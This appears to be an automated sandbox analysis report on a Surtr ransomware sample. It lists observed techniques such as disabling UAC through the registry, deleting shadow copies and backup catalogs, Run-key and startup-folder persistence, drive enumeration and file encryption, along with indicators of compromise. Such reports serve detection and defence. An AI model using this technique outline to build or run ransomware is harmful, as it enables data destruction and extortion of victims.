surtr | 6d6574e74ba62be38aa98daca0afab87a809d956a4ed0b2adb216940df5fdb04

Data Destruction

T1485

pid	Process
3760	fsutil.exe

Detects Surtr Payload 1 IoCs

resource	yara_rule
behavioral4/files/0x0006000000022e4e-196.dat	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

pid	Process
5020	bcdedit.exe
1572	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

pid	Process
2632	wbadmin.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\desktop.ini	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\M:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\Z:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\N:	reg.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\I:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\Q:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\E:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\L:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\F:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\T:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\W:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\Y:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\G:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\A:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\R:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\F:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\P:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\T:	schtasks.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\H:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\S:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\U:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Java\jdk1.8.0_66\include\win32\SURTR_README.hta	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Green Yellow.xml	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_MAK-ppd.xrm-ms	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ul-oob.xrm-ms	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-pl.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-ppd.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\hive.xsl	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Bibliography\SURTR_README.txt	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\PrivateData_3w6r82pc4b3jym.surt	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp2-ul-phn.xrm-ms	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File created	C:\Program Files\Common Files\System\Ole DB\fr-FR\SURTR_README.hta	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\PrivateData_3w6r82pc4b3jym.surt	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\Office16\SLERROR.XML	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\SURTR_README.hta	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Retail-ul-oob.xrm-ms	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\7-Zip\Lang\si.txt.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\SURTR_README.hta	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PREVIEWTEMPLATE2.POTX	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-phn.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-pl.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul-oob.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Trial-pl.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ul-oob.xrm-ms	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\WordR_Retail-ppd.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File created	C:\Program Files\Common Files\System\ado\ja-JP\SURTR_README.hta	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\SURTR_README.txt	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Trial-ppd.xrm-ms	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000006\PrivateData_3w6r82pc4b3jym.surt	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-80.png.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_de_DE.jar.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-compat.jar.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ul-phn.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\bin\dtplugin\PrivateData_3w6r82pc4b3jym.surt	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Marquee.xml.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ConsumerSub_Bypass30-ul-oob.xrm-ms	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_KMS_Client-ppd.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ar.txt.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\javaws.jar.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_BypassTrial180-ul-oob.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-output2.jar	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-ppd.xrm-ms	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_MAKC2R-pl.xrm-ms.[[email protected]].[3w6r82pc4b3jym].Surtr	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\SURTR_README.hta	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
1292	schtasks.exe
364	schtasks.exe

Interacts with shadow copies 2 TTPs 51 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

pid	Process
5004	vssadmin.exe
5984	vssadmin.exe
5960	vssadmin.exe
3436	vssadmin.exe
4940	vssadmin.exe
1392	vssadmin.exe
1724	vssadmin.exe
3080	vssadmin.exe
5460	vssadmin.exe
3000	vssadmin.exe
4580	vssadmin.exe
5348	vssadmin.exe
3140	vssadmin.exe
3260	vssadmin.exe
5652	vssadmin.exe
2012	vssadmin.exe
3624	vssadmin.exe
6108	vssadmin.exe
5640	vssadmin.exe
3844	vssadmin.exe
1292	vssadmin.exe
2688	vssadmin.exe
4716	vssadmin.exe
228	vssadmin.exe
2212	vssadmin.exe
4172	vssadmin.exe
276	vssadmin.exe
4644	vssadmin.exe
3264	vssadmin.exe
1884	vssadmin.exe
364	vssadmin.exe
3044	vssadmin.exe
3704	vssadmin.exe
2484	vssadmin.exe
4948	vssadmin.exe
4484	vssadmin.exe
4544	vssadmin.exe
2100	vssadmin.exe
3392	vssadmin.exe
2992	vssadmin.exe
3636	vssadmin.exe
4136	vssadmin.exe
4276	vssadmin.exe
2336	vssadmin.exe
5648	vssadmin.exe
4248	vssadmin.exe
3388	vssadmin.exe
4012	vssadmin.exe
6116	vssadmin.exe
880	vssadmin.exe
2072	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
